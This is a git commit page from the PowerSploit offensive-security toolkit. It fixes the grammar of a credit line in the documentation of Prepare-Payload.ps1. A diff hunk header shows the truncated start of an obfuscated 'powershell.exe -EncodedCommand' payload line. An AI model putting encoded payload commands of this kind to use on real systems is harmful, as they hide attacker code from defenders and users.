aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorbitform <matt@exploit-monday.com>2012-11-22 09:45:43 -0500
committerbitform <matt@exploit-monday.com>2012-11-22 09:45:43 -0500
commit7c65f5cfeefb4915e9acf490acc3f038f1f4fe12 (patch)
tree8ce53c6e618b380678e4f528cd742a88d0057d45
parent7710c99e667ffba985b468a150564b326f150054 (diff)
downloadPowerSploit-7c65f5cfeefb4915e9acf490acc3f038f1f4fe12.tar.gz
PowerSploit-7c65f5cfeefb4915e9acf490acc3f038f1f4fe12.zip
Fixed Prepare-Payload documentation grammar fail.
-rw-r--r--Prepare-Payload.ps12
1 files changed, 1 insertions, 1 deletions
diff --git a/Prepare-Payload.ps1 b/Prepare-Payload.ps1
index e1b4a3b..2797466 100644
--- a/Prepare-Payload.ps1
+++ b/Prepare-Payload.ps1
@@ -55,7 +55,7 @@ powershell.exe -EncodedCommand cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkA
.NOTES
-This cmdlet was inspired by createcmd.ps1 script presented at Dave Kennedy and Josh Kelley's talk - "PowerShell...OMFG" (https://www.trustedsec.com/files/PowerShell_PoC.zip)
+This cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kennedy and Josh Kelley's talk, "PowerShell...OMFG" (https://www.trustedsec.com/files/PowerShell_PoC.zip)
.LINK